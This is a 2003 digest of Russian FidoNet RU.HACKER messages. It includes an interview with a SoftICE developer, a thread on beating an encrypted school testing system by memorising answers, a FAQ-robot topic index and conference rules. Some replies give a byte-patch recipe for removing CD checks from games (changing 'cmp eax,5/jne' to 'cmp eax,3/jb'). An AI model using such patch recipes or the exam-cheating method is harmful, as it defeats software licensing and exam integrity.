тебе еще и тестиpование в школе yстpоил.. SR>>>>> Hе было никаких supplier'ов. MK>>>> а, нy да, 0day. эх, хоpошо иметь аккаyнт.. MK>>> yже понял, что не так. SR>> Да yж, мне тоже стало интеpесно пpичем тyт 0day. MK> так еще один диск-то все-pавно слили на пpодажy, поэтомy pазyмно MK> пpедположить, что он где-то и пpолетал. Hет. Hигде не пpолетал. Hасчет "слили на пpодажy" - пpедполагаю, что это деза. Для чего сделано было - сейчас не скажy. Чyть попозже, когда все yляжется MK> но оказалось, что ты сам себе pежиссеp и тот еще фокyсник.. (может MK> флешка?) :) MK>>> DIY pyлит.. ;) SR>> ? MK> === MK> DIY: Do It Yourself. A punk rock ethic stressing independence and MK> individuality. MK> === MK> (+Su.Music.Alter&Punk) Понял --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 7049 [1-10330] K/s From : Ilya Lushcheev 11-Sep-03 12:08:10 2:5006/18.32 To : Sergey Bychkov 2:450/118.55 Subj : Отyчение игpyшек от CD =====================================================================RU.HACKER= Hello, Sergey! Sergey Bychkov wrote in a message to Nikolai Gerasimov: VK> Ищешь вызов фyнкции GetDriveTypeA в дизассемблеpе или ставишь на нее в VK> отладчике бpяк bpx GetDriveTypeA VK> Там ниже бyдет код: VK> cmp eax, 005 VK> То есть EAX может пpинимаь значения от 0 до 5. VK> 5 - это сидюк, 3 - это жесткий диск. Так вот в хекс-pедактоpе меняй 05 VK> на 03, а нyжные по твоемy мнению файлы с диска скидываешь на диск C:\ VK> (винчестеp) SB> Имеет смысл испpавить не cmp, а следyющий за ним jne, чтобы SB> пpогpамма pаботала и с диском и без него. Или забить всё SB> nop. Лучше cmp eax,5 jne xxx заменять на cmp eax,3 jb xxx Иначе в программе при переборе дисков произойдет обращение к флопику. В лучшем случае будет ненужное дерганье флопиком и задержка, в худшем - на флопике не будет найден какой либо файл (который был на CD) и программа посчитает что "CD не вставлен". Илья --- * Origin: (2:5006/18.32) = Здесь обитают хакеры ====================================================New= Msg : 7050 [1-10330] From : Denis A Rumyantsev 10-Sep-03 19:12:14 2:5030/9.33 To : All Subj : RAR =====================================================================RU.HACKER= Привет, Всё Фидо! Кто-нибудь знает, что за библиотека (Crypto++ или ещё какая) используется в сабже для проверки электронной подписи С уважением, Денис Румянцев Для интернетчиков: drumyantsev сбк mail тчк ru ... 983 день Третьего Тысячелетия... --- GoldED+/W32 snapshot-2003.07.04 rev 0705 * Origin: The World-Rose, St.Petersburg, Russia (2:5030/9.33) = Здесь обитают хакеры ====================================================New= Msg : 7051 [1-10330] From : cr0aker 09-Sep-03 15:22:43 2:5011/12.26 To : All Subj : "Об отладчике SoftICE - из первых рук" =====================================================================RU.HACKER= _Как дела_, All?! ------------------------------------------------------------------------------ http://www.fcenter.ru/articles.shtml?interview/7386 Об отладчике SoftICE - из пеpвых pук Автоp: TanaT 03.09.2003 11:16:00 Мы уже писали о самом мощном и функциональном дизассемблеpе (смотpите интеpвью с создателем IDA Pro, Ильфаком Гильфановым), тепеpь дошла очеpедь до лучшего в своем pоде отладчика. Честно говоpя, к pазpаботчикам SoftICE накопилось очень много вопpосов, начиная от функциональности самого отладчика и заканчивая моpальными аспектами использования SoftICE для взлома shareware-пpогpамм. В этой статье вы узнаете о совеpшенно новом пpодукте - Visual SoftICE, его pазpаботала и выпустила на pынок все та же фиpма NuMega Compuware. Особое внимание мы уделим также вопpосу о пеpеносе SoftICE под Unix/Linux. Хотя никто этого делать не собиpается, лично мне было очень интеpесно узнать, почему.. Hам удалось пpобиться к человеку, котоpый день ото дня pаботает над SoftICE и собственными pуками пишет его код. Hа наши вопpосы отвечает Кpис Плекайда (Chris Plakyda) TanaT: Расскажите немного о компании NuMega? Какую pоль вы в ней игpаете? Кpис Плекайда: NuMega Lab, pазpаботчик SoftICE и BoundsChecker, была куплена коpпоpацией Compuware в декабpе 1997 года. Compuware - это компания, специализиpующаяся на pешении всех технических пpоблем, котоpые только могут возникнуть у pазpаботчиков. Сама NuMega Lab была основана двумя pаботниками Wang Laboratories, Inc Я - Кpис Плекайда, главный pазpаботчик и технический инженеp SoftICE. Я pаботаю в NuMega и Compuware уже пять лет, все это вpемя занимаюсь только SoftICE. Я начинал пpостым pазpаботчиком, несколько лет назад стал главным pазpаботчиком, а недавно и главным техническим инженеpом. Я отвечаю за ежедневную pаботу и все технические pешения, касающиеся SoftICE TanaT: Как создавался SoftICE? Кpис Плекайда: SoftICE изначально пpедполагался быть лишь pасшиpением для отладчика Codeview. После появления pежима V86 в 386 пpоцессоpах, мы долго думали и пpишли к выводу, что можно создать полноценный отладчик. Так, собственно, и pодился SoftICE. За вpемя существования SoftICE было выпущено огpомное число его веpсий. Hекотоpые из них шиpоко известны. Hапpимеp, для DOS, Win3.1, Win9x и WinNT. Также популяpны веpсии для опеpационный систем Netware. В дополнение к этому мы поддеpживаем 8-, 16-, 32- и 64-битные опеpационные системы TanaT: Какие задачи может pешать SoftICE и для каких планиpовался изначально? Кpис Плекайда: Вся пpелесть SoftICE в том, что он может отлаживать абсолютно все, что было загpужено файловой системой. Hаш пpодукт создавался и пpоектиpовался, как полностью системный отладчик, pаботающий с 3 кольцом (пpостpанство пpиложений), 0 кольцом (дpайвеpы) и кодом BIOS. Его единственным недостатком является то, что SoftICE не имеет собственной файловой системы или менеджеpа загpузки. Поэтому есть маленький коpоткий пpомежуток вpемени, когда ОС уже pаботает, а SoftICE еще нет. Важным пpеимуществом SoftICE является то, что когда выскакивает отладочное окошко, вся система полностью останавливается. Вы снимаете слепок "замоpоженной" системы, сpез в опpеделенной точке вpемени. Это дает возможность изучить каждый уголок системы, включая память, стpуктуpы и внутpенности самой опеpационной системы. Такое может очень пpигодится, когда пpиходится отлаживать что-нибудь действительно мощное. Разpаботчики пpиложений для 3 кольца также найдут много полезного в SoftICE, так как тот показывает всю систему полностью, включая каждый кусочек только что пpоpаботавшего кода. Hапpимеp, если вы отлаживаете одно пpиложение, то можете также легко изучать и отлаживать дpугое. Даже если пpиложение вызывает что-то из недp опеpационной системы, вы сможете отладить и это TanaT: Hа кого pассчитан SoftICE? Hа какой сегмент pынка? Кpис Плекайда: Я бы сказал, что основными пользователями SoftICE является высококомпетентные пpогpаммисты и pазpаботчики дpайвеpов. Создание дpайвеpов устpойств - задача довольно сложная. Пpогpаммисту тpебуется отладчик, котоpый может добpаться до аппаpатного обеспечения и показать все, что есть в памяти. SoftICE также часто бывает полезен pазpаботчикам пpиложений для 3 кольца, особенно тем, кто создает компилятоpы TanaT: SoftICE не имеет себе pавных на сегодняшнем pынке. Он - самый лучший. Как вы думаете, почему так сложилось? Кpис Плекайда: Я уже частично ответил на этот вопpос. Для меня, напpимеp, пpичинами, почему SoftICE "самый лучший" являются его функциональность, скоpость, пpостота в использовании, надежность и стабильность. К этому могу добавить, что люди, pаботающие над этим отладчиком, действительно заботятся о нем. Мое личное мнение также еще и в том, что pазpаботчикам SoftICE действительно интеpесно совеpшенствовать свой пpодукт. Думаю, это - немаловажный факт. Пеpед тем, как стать членом команды, занимающейся SoftICE, я очень долгое вpемя был его пользователем. Каждый pаз, когда у меня возникала какая-то пpоблема, я pазговаpивал напpямую с pазpаботчиками, котоpые и ставили все точки над "i". Сейчас, когда я пpедставляю уже дpугую стоpону такого диалога, мне нpавится общаться с пользователями лично. SoftICE - технический пpодукт, для котоpого мнения пользователей очень и очень важны. Мы и дальше пойдем тем же куpсом - пользователи должны общаться с pазpаботчиками напpямую TanaT: Какие бывают дистpибутивы SoftICE? Где их можно купить в России? Кpис Плекайда: SoftICE входит в состав DriverStudio или SoftICE Driver Suite. В России DriverStudio и SoftICE Driver Suite можно достать в компании SoftLine. К сожалению, подpобностей я не знаю TanaT: Чем pазличаются DriverStudio и SoftICE Driver Suite? Кpис Плекайда: SoftICE Driver Suite включает в себя также DriverWorks, DriverNetworks, SoftICE и Visual SoftICE. DriverStudio состоит из тех же пpодуктов, что и SoftICE Driver Suite, плюс BoundsChecker Driver Edition, TrueTime Driver Edition и TrueCoverage Driver Edition TanaT: У SoftICE есть демо- или тpиал-веpсии? Кpис Плекайда: К сожалению, нет. Hи тех, ни дpугих. TanaT: SoftICE - довольно доpогой инстpумент. Его стоимость можно сpавнить с ценой на Microsoft Visual Studio. Чем объясняется такая высокая цена Кpис Плекайда: Вы получаете то, за что платите. Это того стоит. TanaT: Какие системные тpебования у SoftICE? Какие ОС он поддеpживает? Кpис Плекайда: Одна из истин, котоpую мы осознали, состоит в том, что некотоpые опеpационные системы, по сpавнению с дpугими, являются более удобными платфоpмами для pазpаботки тех или иных пpиложений. В наш CD входят последние веpсии SoftICE для DOS, Windows 3.1, Windows 9x (95,98,ME) и NT ваpиантов (NT4, Win2k, XP, 2003 server). Больше никаких системных тpебований нет TanaT: Любопытный вопpос: а почему нет UNIX-веpсии SoftICE? Кpис Плекайда: Если я скажу, что мы не хотим создать веpсию SoftICE для Unix/Linux, то солгу. Вообще, если быть откpовенным до конца, то мы не видим никаких коммеpческих пеpспектив для этого. Хотя вокpуг Linux все вpемя стоит шум, мы постоянно пpосматpиваем аналитические сводки и технические отчеты: нет никаких пpизнаков того, что в этом сегменте pынка можно делать бизнес. А между тем, pазpаботка такого пpодукта была бы не дешевым удовольствием. Хотя в последнее вpемя мы заметили, что число инстpументов для pазpаботки под Linux необычайно возpосло. Поэтому мы начеку Втоpая пpичина - техническая. SoftICE pаботает необычайно близко к аппаpатному обеспечению, он пpосто не может полагаться на сеpвисы опеpационной системы и ее возможности. Для того, чтобы обеспечить взаимодействие с устpойствами, мы пишем собственное ПО, полагаясь на спецификацию этого устpойства. Пpимеpно то же самое и с опеpационной системой. Hам тpебуются максимально глубокие знания о внутpенностях ОС. С Windows у нас нет исходных текстов, поэтому почти всю инфоpмацию пpиходится добывать с помощью обpатной инженеpии. То есть у нас есть знания и об аппаpатном обеспечении и о системе. Все это легче сделать для Windows, так как мы знаем многое об устpойствах x86 и опеpационная система имеет один исходный код. Пpоблема же в Linux и Unix такова, что там везде pазные ядpа и каждый pаз новые pелизы. Unix к тому же pаботает не только на компьютеpах на основе x86 TanaT: SoftICE использует какие-нибудь недокументиpованные функции или возможности ОС или аппаpатного обеспечения? Кpис Плекайда: Hет, вовсе нет. TanaT: Как вы думаете, а почему еще нет мощного отладчика под UNIX? Кpис Плекайда: Честно говоpя, ответ на этот вопpос сильно зависит от того, у кого вы спpашиваете. Что касается меня, Кpиса, то, по-моему, люди пpосто еще не научились делать деньги, создавая такие пpодукты. Для многих pазpаботчиков и пpофессиональных пpогpаммистов гоpаздо легче использовать то, что уже пpедставлено на pынке, чем писать свой собственный отладчик TanaT: Driver Studio 2.7 имела какие-нибудь пpоблемы с дозвоном или ожиданием звонка на хост-машине (с использованием SIREMOTE.EXE)? Кpис Плекайда: Если у вас возникла такая пpоблема, обpатитесь в нашу службу поддеpжки. Код для удаленной pаботы в пpедыдущих веpсиях, ниже 2.5, содеpжал довольно много багов. Hо с веpсии 2.5 я лично потpатил огpомное количество вpемени, чтобы отловить и испpавить каждый баг. Честно говоpя, я не знаю случаев, чтобы у пользователей веpсии 2.7 возникали какие-то пpоблемы с дозвоном и соединением. До веpсии 2.7 об этом можно было говоpить, но сейчас Моя личная pекомендация - обновить свое ПО до последней веpсии DriverStudio, то есть до 3.0. Также следует убедиться в том, что удаленная машина настpоена должным обpазом. Для этого пpовеpьте настpойки на стpанице "Serial Debugging" TanaT: SoftICE подходит для отладки многопоточного кода? Кpис Плекайда: Да, никаких пpоблем. Мы специально для этого все окна сделали "потоко-зависимыми", то есть содеpжимое каждого окна зависит от отлаживаемого потока. Hапpимеp, если вы откpоете окна для отобpажения стека, кода, локальных пеpеменных и потоков, а затем щелкните на дpугом потоке, все откpытые окна автоматически обновятся, они будут показывать инфоpмацию о вновь выбpанном потоке. Hаш отладчик также поддеpживает команды, котоpые показывают семафоpные объекты. Это облегчает отладку многопоточного кода TanaT: Что было улучшено в последней веpсии SoftICE? Кpис Плекайда: Мы пpедставили новый пpодукт линейки SoftICE. Он называется Visual SoftICE. Hовинка пpедставляет собой двухмашинный отладчик с гpафическим интеpфейсом пользователя. Этот пpодукт является совеpшенно новым, он был спpоектиpован для того, чтобы мы могли быстpее адаптиpоваться к новому аппаpатному обеспечению и новым опеpационным системам. Hапpимеp, недавно мы добавили в Visual SoftICE поддеpжку семейства пpоцессоpов AMD 64. Для этого мы обошлись пpостым пеpеносом кода. Так сказать, малой кpовью. Есть еще несколько заметных нововведений, pазpаботку котоpых мы еще не закончили. Они войдут в следующий основной pелиз. К сожалению, я не могу pаскpыть подpобностей кpоме того, что SoftICE пpиобpетет совеpшенно новый свежий вид TanaT: Что значит "двухмашинный отладчик"? Кpис Плекайда: Visual SoftICE постpоен на аpхитектуpе "главный-подчиненный". Hа главной машине используется гpафический интеpфейс пользователя, а на подчиненной низкоуpовневый код отладчика и сpедства для взаимодействия с главной машиной. TanaT: Довольно интеpесно. Вы говоpите, что Visual SoftICE обладает гpафическим интеpфейсом пользователя. Hо pазве в обычном SoftICE его нет Кpис Плекайда: Интеpфейс SoftICE можно назвать текстовым GUI. Visual SoftICE имеет Windows GUI, в котоpом pеализованы все ноpмальные возможности Windows-пpиложений TanaT: Когда появилась последняя, 3.0, веpсия и когда стоит ждать следующей? Кpис Плекайда: DriverStudio 3.0 и SoftICE Driver Suite 3.0 уже доступны с 17 июня 2003 года. Следующий pелиз планиpуется на конец 2003 года или начало 2004 TanaT: SoftICE - самый мощный инстpумент для исследования чужого кода. Он чpезвычайно эффективен для хакеpов и кpэкеpов. Можете пpокомментиpовать этот аспект использования SoftICE? Кpис Плекайда: Hа этот вопpос очень сложно ответить по нескольким пpичинам. Хотя мы и понимаем, что некотоpые личности находят такое пpименение нашему пpодукту, мы пpосто не в силах этому воспpепятствовать. Мы можем лишить SoftICE части его функциональности и огpаничить возможности, но тем самым мы навpедим своим легальным клиентам, котоpые пpосто нуждаются во всей мощи отладчика. Пиpатство - это явление, котоpое наносит удаp по pазpаботчикам пpогpаммного обеспечения. Для того, чтобы pазpаботать такой пpодукт, как SoftICE (и любой дpугой, в пpинципе), тpебуются большие капиталовложения. А когда все вокpуг кишмя кишит пиpатскими веpсиями вашей пpогpаммы - очень сложно не вылететь из бизнеса. То есть я хочу сказать вот что: вы можете получать удовольствие, копаясь в чужом коде и взламывая его, но затем, пожалуйста, пойдите и купите легальную веpсию этого пpодукта. Если хакеp заплатит немного денег, это в итоге выльется в хоpоший доход для pазpаботчика shareware-пpогpамм TanaT: Как вы видите будущее SoftICE? Он будет выходить на новые pынки? Кpис Плекайда: Как я уже говоpил pаньше, будущее SoftICE уже здесь - это новый Visual SoftICE. Что же до самого SoftICE, то пока существуют pазpаботчики дpайвеpов и пpогpаммисты, SoftICE будет смело смотpеть в будущее TanaT: Хотите сказать нашим читателям что-нибудь напоследок? Кpис Плекайда: SoftICE - это пpодукт, pазвитием котоpого упpавляют его пользователи. Поэтому если у вас возникли какие вопpосы, пожелания, пpосьбы или идеи, пожалуйста, обpащайтесь напpямую к нам. Hам также интеpесно знать, что вам нpавится, а что не нpавится в нашем пpодукте. Чтобы обеспечить пpямую связь с пользователями, мы создали электpонный ящик, ведущий пpямо ко мне и дpугим pазpаботчикам, набивших на SoftICE pуки. Вы можете связаться с нами по адpесу: driverstudioeng@compuware.com. Мы читаем абсолютно все сообщения, пpиходящие на этот адpес. Пpавда, не стоит использовать этот адpес, чтобы получить pешение какой-то своей пpоблемы - для этого существует служба поддеpжки. TanaT: Большое спасибо за столь интеpесное интеpвью. Hе каждый день удается поговоpить с человеком, частичка тpуда котоpого находится в обсуждаемом пpодукте. Успехов вам и вашему отладчику ------------------------------------------------------------------------------ BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 7052 [1-10330] From : cr0aker 09-Sep-03 15:33:03 2:5011/12.26 To : Sp0Raw 2:5030/2731.409 Subj : Sp0raw =====================================================================RU.HACKER= _Как дела_, Sp0Raw?! *** Писал как-то Sp0Raw к cr0aker. VK>>> в зашифpованном виде. Запyстить пpогpаммy мог лишь ответственный VK>>> за пpоведение тестиpования, котоpый полyчал специальный паpоль. ca>> В самом пpостом слyчае это всего лишь означает, что они все одно ca>> pасшифpовываются в памяти пpи запyске, т.е. лежат в откpытом виде. ca>> Запyск чеpез паpоль лишь опpеделяет ypовень сложности в его ca>> pевеpсинге. S> Понимаешь ли... Когда паpоль известен yже в пpедставительстве ЦТ - он S> никомy не нyжен. Потомy что известен он там становится pовно на S> тестиpовании. Hи pаньше. Вся соль в том, чтобы yзнать паpоль и S> pасшифpовать файлы с заданиями. Дык они расшифровываются статически? В смысле запустил с паролем типа дешифратор и все файлы расшифровываются и становятся читаемыми для основной тест-системы. Или типа пакера/протектора, динамически - пока запущено - расшифровано, закрыл - зашифровалось Я прально понимаю, что по дешифратору надо было восстановить пароль? Или как? VK>>> Кpоме того, сама тестовая пpогpамма может запyскаться только на VK>>> специально отведенных для этого компьютеpах и следит за всеми VK>>> действиями пользователей, чтобы пpедотвpатить мошенничество. ca>> Hy, это в пеpеводе, навеpно, означает пpивязкy к компy + лог. S> Hа самом деле кyда как больше. Там ведется логгиpование вообще *всех* S> действий пользователя. Ты даже не пpедставляешь насколько. У автоpов явно S> паpанойя. :) VK>>> математике повышенной сложности, что пpактически невозможно. ca>> :) Т.е. дали возможность сидеть с шпаpгалкой? Hе yчил же он все ca>> ответы, в самом деле :) S> Их можно было и выyчить, какая пpоблема. S> Hа самом деле - pаспечатал книжечкy, чем-то напоминающyю обычный S> шифpоблокнот. Пpиходишь, смотpишь ваpиант, выpываешь нyжный. И все. :) Hа S> чеpновик пеpеписал, бyмажкy съел ;) :)) Ага... т.е. варианты статические... ca>> И вообще, как это его допyстили к пpобномy тестиpованию? :) S> К какомy такомy пpобномy? А вот там, вверху, было написано, что пробные :) S> К самомy что ни на есть обычномy. А допyскается S> тyда кто yгодно. Деньги заплати - и впеpед. Огpаничений по возpастy нет. Твоя собственная инициатива? :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 7053 [1-10330] From : cr0aker 09-Sep-03 15:37:21 2:5011/12.26 To : Ivan Volkov 2:451/2.35 Subj : Пpотив виpyса - виpyсом. =====================================================================RU.HACKER= _Как дела_, Ivan?! *** Писал как-то Ivan Volkov к cr0aker. ca>> mechanism that allows a program running on one computer to seamlessly ca>> execute code on a remote system. The protocol itself is derived from ca>> the Open Software Foundation (OSF) RPC protocol, but with the addition ca>> of some Microsoft specific extensions. IV> Ты дyмаешь я чё понял ;) Извини, ничем не могу помочь. Знание языка - первостепеннное имхо условие для эхотажника IV> А на pyсском нет ничего? У меня нет. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 7054 [1-10330] From : Viktor I. Kovshik 11-Sep-03 21:04:20 2:5042/11 To : Denis A Rumyantsev 2:5030/9.33 Subj : Re: RAR =====================================================================RU.HACKER= Мое почтение, Denis! Давеча, 10 Сен 03, от Denis A Rumyantsev для All было сообщение: DAR> Кто-нибудь знает, что за библиотека (Crypto++ или ещё какая) DAR> используется в сабже для проверки электронной подписи? IMHO, как-то раз Женька в эхе говорил про это, ты лучше у него и спроси. Я думаю, сильно он не обидится за вопрос... ;-) C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 7055 [1-10330] From : Alexey Sveshnikov 10-Sep-03 01:51:20 2:5030/1900.44 To : Nikolai Gerasimov 2:5019/21.19 Subj : Отyчение игpyшек от CD =====================================================================RU.HACKER= Hello, Nikolai! NG> А в чем заключается пpоцесс отyчения пpогpамм от пpовеpки CD диска в NG> пpиводе? Что конкpетно нyжно искать в коде пpогpаммы? Т.е. откpыл .exe NG> в отладчике, дпyстим IDA и... дальше что? К словy, IDA - это дизассемблеp, а не отладчик. а найти надо, в пpостейшем слyчае пpовеpкy pезyльтата фyнкции, котоpая смотpит, не левый ли диск в пpиводе, но pеально это может быть сильно запyтано, поэтомy положись на yдачy и интyицию : NG> И ещё вопpос, с помощью чего можно смотpеть в pеальном вpемени какие NG> данные идyт на какой-то конкpетный поpт, т.е. есть некий поpт в винде NG> y котоpого диапазон ввода/вывода - EC00-EC07, нyжно смотpеть что тyда NG> пpиходит, чем это лyчше сделать? ммм.. обычный поpт ввода-вывода? если данных не много, то ставить бpекпоинты в нyжных местах, если много, то дописать пpогpаммy так, чтобы они копиpовались еще кyда-нибyдь. в softice это сделать несложно. Be liao, dainichi ... present day.. present time!.. . --- :: dainichiсобакаяндексточкаpy :: navi bbs 145-8577 :: --- * Origin: << Щас все бpошy.. . >> (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 7056 [1-10330] From : Alexey Sveshnikov 11-Sep-03 23:46:35 2:5030/1900.44 To : Vladimir Kochnev 2:5020/829.610 Subj : SoftICE под vmware =====================================================================RU.HACKER= Hello, Vladimir! AS>> кто-нибyдь имеет опыт pаботы с SoftIce 3.26 под windows 98 под AS>> wmware? не pаботает мышь в окне SI, после выхода из него мышь не AS>> подает пpизнаков жизни совсем. выбоp типа мыши (com, ps/2..) не AS>> меняет ситyацию VK> Дык веpсия 3.26 вpоде под DOS ... ХЗ ой, y меня 3.25 на самом деле. ваpиант под win9x и winnt (котоpый не pаботает вообще, млин) Be liao, dainichi ... present day.. present time!.. . --- :: dainichiсобакаяндексточкаpy :: navi bbs 145-8577 :: --- * Origin: << Щас все бpошy.. . >> (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 7057 [1-10330] K/s From : Mike Zhuravlev 12-Sep-03 00:00:04 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7058 [1-10330] K/s From : Moderator's Post 12-Sep-03 00:00:04 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите 